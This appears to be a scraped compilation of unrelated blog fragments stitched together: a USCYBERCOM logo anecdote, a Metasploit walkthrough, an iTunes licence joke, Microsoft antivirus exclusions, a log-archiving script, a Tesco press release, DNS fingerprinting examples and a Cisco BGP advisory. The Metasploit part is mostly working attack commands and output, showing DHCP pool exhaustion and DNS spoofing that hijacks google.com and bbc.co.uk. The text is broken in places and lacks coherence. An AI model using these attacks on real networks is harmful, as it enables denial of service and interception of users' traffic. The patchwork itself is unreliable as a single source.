On the of the inner ring is

9ec4c12949a4f31474f299058ce2b22a

Looks like a hash to me.

When you unhash it it says

“USCYBERCOM plans, coordinates, integrates, synchronizes, and conducts activities to: direct the operations and defense of specified Department of Defense information networks and; prepare to, and when directed, conduct full-spectrum military cyberspace operations in order to enable actions in all domains, ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries.”

What a different way to get your mission statement into your logo – without actually putting it there.

He has also created a DNS Man in The Middle module which has been worked on by various people, the last being Wesley McGrew who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and returns real results for everything else. His work on this was to add the facility to have it reload the config file without a restart by doing a look up on a pre-set domain. He also fixed a couple of minor bugs.

See http://www.digininja.org/metasploit/dns_dhcp_beta.php

Usage

You’ll need to be root to run both modules and for the DHCP module you’ll need to put the interface into promiscious mode before starting the attack so it can hear all the replies to the fake requests. The easiest way to explain how to use them is to just show the modules in use so here they are…

DHCP Exhaustion

msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > set

Global
======

No entries in data store.

Module: dhcp_exhaustion/exhaust
===============================

  Name        Value
  ----        -----
  DHCPSERVER  255.255.255.255
  SNAPLEN     65535
  TIMEOUT     2

msf auxiliary(exhaust) > run

[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed

DNS MiTM

msf > use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name     Value
  ----     -----
  RELOAD   digininja.reload
  SRVHOST  0.0.0.0
  SRVPORT  53

msf auxiliary(dns_mitm) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) > set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME => /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) > set REALDNS 192.168.0.8
REALDNS => 192.168.0.8
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name      Value
  ----      -----
  FILENAME  /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
  REALDNS   192.168.0.8
  RELOAD    digininja.reload
  SRVHOST   0.0.0.0
  SRVPORT   53

msf auxiliary(dns_mitm) > run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) >
[*] Loading hosts file

The hosts file contains a single entry

192.168.0.2 google.com

Now do some look ups, google.com and bbc.co.uk

nslookup
> server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
> google.com
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 212.58.224.138

Google is middled but the BBC gets through, now add the BBC to the hosts file

echo "192.168.0.2 bbc.co.uk" >> dns.txt

Refresh the server by looking up the special domain and then check the BBC again

> digininja.reload
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
*** Can't find digininja.reload: No answer
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 192.168.0.2

The BBC is now ours!

You may not use or otherwise export or re-export the Licensed Application except as authorized by United States law and the laws of the jurisdiction in which the Licensed Application was obtained. In particular, but without limitation, the Licensed Application may not be exported or re-exported (a) into any U.S. embargoed countries or (b) to anyone on the U.S. Treasury Department’s list of Specially Designated Nationals or the U.S. Department of Commerce Denied Person’s List or Entity List. By using the Licensed Application, you represent and warrant that you are not located in any such country or on any such list. You also agree that you will not use these products for any purposes prohibited by United States law, including, without limitation, the development, design, manufacture or production of nuclear, missiles, or chemical or biological weapons.

Notice, as I read this clause not only are terrorists — or at least those on terrorist watch lists — prohibited from using iTunes to manufacture WMD, they are also prohibited from even downloading and using iTunes.  So all the Al-Qaeda operatives holed up in the Northwest Frontier Provinces of Pakistan, dodging drone attacks while listening to Britney Spears songs downloaded with iTunes are in violation of the terms and conditions, even if they paid for the music!

That’ll show ‘em…

For computers that are running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Windows 2000, Windows XP, Windows Vista, or Windows 7

Do not scan the following files and folders. These files are not at risk of infection. If you scan these files, serious performance problems may occur because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any one of these based on the file name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extensions as the following files:

Microsoft Windows Update or Automatic Update related files

The Windows Update or Automatic Update database file. This file is located in the following folder:
%windir%\SoftwareDistribution\Datastore
Exclude the Datastore.edb file.
The transaction log files. These files are located in the following folder:
%windir%\SoftwareDistribution\Datastore\Logs
Exclude the following files:

Edb*.log

Note The wildcard character indicates that there may be several files.
Res1.log. The file is named Edbres00001.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
Res2.log. The file is named Edbres00002.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
Edb.chk
Tmp.edb
The following files in the %windir%\security path should be added to the exclusions list:

*.edb
*.sdb
*.log
*.chk

Note If these files are not excluded, security databases are typically corrupted, and Group Policy cannot be applied when you scan the folder. The wildcard character indicates that there may be several files. Specifically, you must exclude the following files:

Edb.chk
Edb.log
*.log
Security.sdb in the <drive>:\windows\security\database folder

Group Policy related files

Group Policy user registry information. These files are located in the following folder:
%allusersprofile%\
Exclude the following file:
NTUser.pol
Group Policy client settings file. These files are located in the following folder:
%Systemroot%\system32\GroupPolicy\
Exclude the following file:
registry.pol

For more information, click the following article numbers to view the articles in the Microsoft Knowledge Base:
951059  (http://support.microsoft.com/kb/951059/ ) On a Windows Server 2003-based computer, registry-based policy settings are unexpectedly removed after a user logs on to the computer
930597  (http://support.microsoft.com/kb/930597/ ) Some registry-based policy settings are lost and error messages are logged in the Application log on a Windows XP-based computer or on a Windows Vista-based computer

For Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers

Because domain controllers provide an important service to clients, the risk of disruption of their activities from malicious code from a virus must be minimized. Antivirus software is the generally accepted way to lessen the risk of virus infection. Install and configure antivirus software so that the risk to the domain controller is reduced as much as possible and so that performance is affected as little as possible. The following list contains recommendations to help you configure and install antivirus software on a Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, or on a Windows 2000 domain controller:

Warning We recommend that you apply the following specified configuration to a test configuration to make sure that in your specific environment it does not introduce unexpected factors or compromise the stability of the system. The risk from too much scanning is that files are inappropriately flagged as having been changed. This results in too much replication in Active Directory. If testing verifies that replication is not affected by the following recommendations, you can apply the antivirus software to the production environment.

Note Specific recommendations from antivirus software vendors may supersede the recommendations in the article.

Antivirus software must be installed on all domain controllers in the enterprise. Ideally, try to install such software on all other server and client systems that have to interact with the domain controllers. It is optimal to catch the virus at the earliest point, such as at the firewall or at the client system where the virus is first introduced. This prevents the virus from ever reaching the infrastructure systems that the clients depend on.
Use a version of antivirus software that is designed to work with Active Directory domain controllers and that uses the correct Application Programming Interfaces (APIs) to access files on the server. Older versions of most vendor software inappropriately change file metadata as it is scanned. This causes the File Replication Service engine to recognize a file change and therefore schedule the file for replication. Newer versions prevent this problem. For more information, click the following article number to view the article in the Microsoft Knowledge Base:
815263  (http://support.microsoft.com/kb/815263/ ) Antivirus, backup, and disk optimization programs that are compatible with the File Replication service
Do not use a domain controller to browse the Web or to perform any other activities that may introduce malicious code.
When you can, do not use the domain controller as a file sharing server. Virus scanning software must be run against all files in those shares, and this can put an unsatisfactory load on the processor and the memory resources of the server
Do not put Active Directory or FRS database and log files on NTFS file system compressed volumes.
For more information, click the following article number to view the article in the Microsoft Knowledge Base:
318116  (http://support.microsoft.com/kb/318116/ ) Issues with Jet Databases on compressed drives
Do not scan the following files and folders. These files are not at risk of infection, and if you include them, this may cause serious performance problems because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any of these based on the file-name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extension as those shown here.

Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
322756  (http://support.microsoft.com/kb/322756/ ) How to back up and restore the registry in Windows

Active Directory and Active Directory-related files:

Main NTDS database files. The location of these files is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File
The default location is %windir%\ntds. Exclude the following files:
Ntds.dit
Ntds.pat
Active Directory transaction log files. The location of these files is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files Path
The default location is %windir%\ntds. Exclude the following files:
EDB*.log (The wildcard character indicates that there may be several files.)
Res1.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)
Res2.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)
Ntds.pat
Note Windows Server 2003 no longer uses the Ntds.pat file.
The NTDS Working folder that is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory
Exclude the following files:
Temp.edb
Edb.chk

SYSVOL files:

The File Replication Service (FRS) Working folder that is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory
Exclude the following files:
FRS Working Dir\jet\sys\edb.chk
FRS Working Dir\jet\ntfrs.jdb
FRS Working Dir\jet\log\*.log
The FRS Database Log files that are located in the following registry key:
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\DB Log File Directory
The default location is %windir%\ntfrs. Exclude the following files:
FRS Working Dir\jet\log\*.log (if the registry key is not set)
FRS Working Dir\jet\log\edbres00001.jrs (Windows Server 2008, and Windows Server 2008 R2)
FRS Working Dir\jet\log\edbres00002.jrs (Windows Server 2008, and Windows Server 2008 R2)
DB Log File Directory\log\*.log (if the registry key is set)
The Staging folder that is specified in the following registry key and all the Staging folder’s sub-folders:
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\Replica Sets\GUID\Replica Set Stage

The current location of the Staging folder and all its sub-folders is the file system reparse target of the replica set staging folders. Staging defaults to the following location:

%systemroot%\sysvol\staging areas

The current location of the SYSVOL\SYSVOL folder and all its sub-folders is the file system reparse target of the replica set root. The SYSVOL\SYSVOL folder defaults to the following location:

%systemroot%\sysvol\sysvol
The FRS Preinstall folder that is in the following location:
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory
The Preinstall folder is always open when FRS is running.

In summary, the targeted and excluded list of folders for a SYSVOL tree that is placed in its default location would look similar to the following:

1. %systemroot%\sysvol                                                  Exclude
2. %systemroot%\sysvol\domain                                           Scan
3. %systemroot%\sysvol\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory  Exclude
4. %systemroot%\sysvol\domain\Policies                                  Scan
5. %systemroot%\sysvol\domain\Scripts                                   Scan
6. %systemroot%\sysvol\staging                                          Exclude
7. %systemroot%\sysvol\staging areas                                    Exclude
8. %systemroot%\sysvol\sysvol                                           Exclude

If any one of these folders or files have been moved or placed in a different location, scan or exclude the equivalent element.
DFS

The same resources that are excluded for a SYSVOL replica set must also be excluded when FRS is used to replicate shares that are mapped to the DFS root and link targets on Windows Server 2008-based, Windows Server 2003-based, or Windows 2000-based member computers or domain controllers.
DHCP

By default, DHCP files that should be excluded are present in the following folder on the server:
%systemroot%\System32\DHCP
Note You should exclude all files and subfolders that exist in this folder.

The location of DHCP files can be changed. To determine the current location of the DHCP files on the server, check the DatabasePath, DhcpLogFilePath, and BackupDatabasePath parameters under the following registry subkey:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\DHCPServer\Parameters

For Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers

DNS: You should exclude all files and subfolders that exist in the following folder:
%systemroot%\system32\dns
WINS: You should exclude all files and subfolders that exist in the following folder:
%systemroot%\system32\wins

You can get more info here

http://support.microsoft.com/kb/822158

Alt + B     Move cursor backward one word on the current line
Alt + F     Move cursor forward one word on the current line
Ctrl + A     Go to the beginning of the line you are currently typing on
Ctrl + C     Kill whatever you are running
Ctrl + D     Exit the current shell
Ctrl + E     Go to the end of the line you are currently typing on
Ctrl + H     Same as backspace
Ctrl + K     Clear the line after the cursor
Ctrl + L     Clears the Screen, similar to the clear command
Ctrl + U     Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + R     Let’s you search through previously used commands
Ctrl + T     Swap the last two characters before the cursor
Ctrl + W     Delete the word before the cursor
Ctrl + Z     Puts whatever you are running into a suspended background process. fg restores it.
Esc + T     Swap the last two words before the cursor
Tab         Auto-complete files and folder names

Before we look at it, my server is running OPENVPN and Uncomplicated Firewall(I’m running Ubuntu Server)

So how does it work?

Firstly we declare that we are using the bash shell using
#!/bin/bash

Next we’re setup some vairables, the first is simply formating the date and calling itself TODAYSDATE,
next we set todays archive to be archive.TODAYSDATE and call its self TODAYS_ARCHIVE

Next we create a directory called archive.TODAYSDATE

Now to the best bit, we start processing the logs
- We extract todays logs out of syslog
- From the extracted logs we extract the firewall (Uncomplicated Firewal/ UFW) logs to a seperate file
- Now extract todays messages log
- From todays extracted logs extract all OPENVPN related logs to a seperate log file
- Extract todays apache access.log and error.log
- Provide us with the currently running processes
- Zip it all up to the /archive/ folder
- back back up a directory level and delete the folder called archive.TODAYSDATE
- Now use mutt to attach the zip file to a email and send it

Now for the script – PLEASE FEEL FREE TO USE

#!/bin/bash
# Script By Liam Somerville, www.rootadmin.co.uk
# Use freely

#####################################################################
#                        Set up the variables
#####################################################################
#Set todays date
TODAYSDATE=`date +”%d-%b-%Y”`

#Format Archive
TODAYS_ARCHIVE=archive.$TODAYSDATE

#####################################################################
#                    Finished setting up Variables
#
#                   Now start processing the log files
#####################################################################

# Make a directory called archive with todays date and change to that direcory
mkdir $TODAYS_ARCHIVE
cd $TODAYS_ARCHIVE

#Write the log files
#Archive todays Syslog, extract all firewall related logs to firewall, then
# extract messages
cat /var/log/syslog | grep “`date +”%b %e” `” > syslog.$TODAYSDATE
cat syslog.$TODAYSDATE | grep UFW > firewall_log.$TODAYSDATE
cat /var/log/messages | grep “`date +”%b %e” `” > messages.$TODAYSDATE
#Process the OPEN VPN Server logs
cat syslog.$TODAYSDATE | grep “ovpn-server” > vpn_server_log.$TODAYSDATE
#
#Proceess Apache Logs
cat /var/log/apache2/error.log | grep “`date +”%b %d” `” > apache_error_log.$TODAYSDATE
cat /var/log/apache2/access.log | grep “`date +”%d/%b” `” > apache_access_log.$TODAYSDATE
#
#Process FTP Logs
cat /var/log/vsftpd.log | grep “`date +”%b %e” `” > ftp_log.$TODAYSDATE
#
# Get a list of currently running process
ps aux > Processes.$TODAYSDATE

# Zip up all the logs and delete todays log
zip /archive/$TODAYS_ARCHIVE.zip *
cd ..
rm -r $TODAYS_ARCHIVE

####################################################################
#                     Now email the zip file
###################################################################
echo | mutt -a /archive/$TODAYS_ARCHIVE.zip -s “Event logs for $TODAYSDATE” you@your.email.address.com

For further information and for customers interested in pre-registration please visit http://www.tescomobileiphone.com/.

For more information on iPhone, please visit www.apple.com/uk/iphone.

More information can be found on Tesco Mobile at http://www.tescomobile.com/

About Tesco Mobile:

Tesco Mobile is a 50:50 joint venture between Tesco and O2. The company sells exclusively Tesco Mobile branded services in Tesco stores, online and through Tesco Direct, across the UK using O2’s technology and network.

Tesco Mobile is also available in the rapidly expanding estate of Tesco Phone Shops which will number over 100 by the end of 2009.

The network gives its customers value, simplicity and choice, offering them award winning, simple, great value Pay as you go and Pay monthly tariffs with rewards such as free credit and Clubcard points.

It is the fastest growing Pay as you go network in 2009 and has been voted as the number one mobile network for customer satisfaction by Which Magazine (May 09).

sudo aptitude install fpdns

This will complete the installation

Using fpdns

fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] server

Where: server is an ip address or a resolvable name
or ‘-’ to read list of servers from stdin
-c (where appropriate check CH TXT version) [off]
-d (debug) [off]
-f (force check CH TXT version) [off]
-F (maximum forked processes) [10]
-p port (nameserver is on this port) [53]
-Q srcaddr (source IP address) [0.0.0.0]
-r retry (set number of attempts) [1]
-s (short form) [off]
-t time (set query timeout) [5]
-v (show version)

fpdns Examples

BIND Version 8 Example

fpdns -D google.com

fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.38.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.32.10): ISC BIND 8.3.0-RC1 — 8.4.4

BIND Version 9 Example

fpdns -D debianhelp.co.uk

fingerprint (debianhelp.co.uk, 212.67.202.2): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]
fingerprint (debianhelp.co.uk, 212.67.203.246): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]

TinyDNS Example

fpdns ns1.eu.dedicatedserver.com.

fingerprint (ns1.eu.dedicatedserver.com., 213.198.65.226): DJ Bernstein TinyDNS 1.05

Microsoft windows 2003 Example
fpdns -D microsoft.com

fingerprint (microsoft.com, 207.68.160.190): Microsoft Windows DNS 2003
fingerprint (microsoft.com, 65.54.240.126): Microsoft Windows DNS 2003

These vulnerabilities affect only devices running Cisco IOS Software with support for four-octet AS number space (here after referred to as 4-byte AS number) and BGP routing configured.

The first vulnerability could cause an affected device to reload when processing a BGP update that contains autonomous system (AS) path segments made up of more than one thousand autonomous systems.

The second vulnerability could cause an affected device to reload when the affected device processes a malformed BGP update that has been crafted to trigger the issue.

Cisco has released free software updates to address these vulnerabilities.

No workarounds are available for the first vulnerability.

A workaround is available for the second vulnerability.

This advisory is posted at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20090729-bgp.shtml.

Affected Products

These vulnerabilities affect only devices running Cisco IOS and Cisco IOS XE Software (here after both referred to as simply Cisco IOS) with support for RFC4893 and that have been configured for BGP routing.

The software table in the section “Software Versions and Fixes” of this advisory indicates all affected Cisco IOS Software versions that have support for RFC4893 and are affected by this vulnerability.

A Cisco IOS software version that has support for RFC4893 will allow configuration of AS numbers using 4 Bytes. The following example identifies a Cisco device that has 4 byte AS number support:

Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  <1-65535>    Autonomous system number
  <1.0-XX.YY>  4 Octets Autonomous system number

Or:

Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  <1-4294967295>  Autonomous system number
  <1.0-XX.YY>     Autonomous system number

The following example identifies a Cisco device that has 2 byte AS number support:

Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#router bgp ?
  <1-65535>  Autonomous system number

A router that is running the BGP process will contain a line in the configuration that defines the autonomous system number (AS number), which can be seen by issuing the command line interface (CLI) command “show running-config”.

The canonical textual representation of four byte AS Numbers is standardized by the IETF through RFC5396 (Textual Representation of Autonomous System (AS) Numbers). Two major ways for textual representation have been defined as ASDOT and ASPLAIN. Cisco IOS routers support both textual representations of AS numbers. For further information about textual representation of four byte AS numbers in Cisco IOS Software consult the document “Explaining 4-Byte Autonomous System (AS) ASPLAIN and ASDOT Notation for Cisco IOS” at the following link: http://www.cisco.com/en/US/prod/collateral/iosswrel/ps6537/ps6554/ps6599/white_paper_c11_516829.html

Cisco IOS Software with support for RFC4893 is affected by both vulnerabilities if BGP routing is configured using either ASPLAIN or ASDOT notation.

The following example identifies a Cisco device that is configured for BGP using ASPLAIN notation:

router bgp 65536

The following example identifies a Cisco device that is configured for BGP using ASDOT notation:

router bgp 1.0

To determine the Cisco IOS Software release that is running on a Cisco product, administrators can log in to the device and issue the show version command to display the system banner. The system banner confirms that the device is running Cisco IOS Software by displaying text similar to “Cisco Internetwork Operating System Software” or “Cisco IOS Software.” The image name displays in parentheses, followed by “Version” and the Cisco IOS Software release name. Other Cisco devices do not have the show version command or may provide different output.

The following example identifies a Cisco product that is running Cisco IOS Software Release 12.3(26) with an installed image name of C2500-IS-L:

Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih

The following example identifies a Cisco product that is running Cisco IOS Software Release 12.4(20)T with an installed image name of C1841-ADVENTERPRISEK9-M:

Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team

The following Cisco products are confirmed not vulnerable:

• Cisco IOS Software not explicitly mentioned in this Advisory
• Cisco IOS XR Software
• Cisco IOS NX-OS

No other Cisco products are currently known to be affected by this vulnerability.

ObtainingFixed Software

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco’s software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html, or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.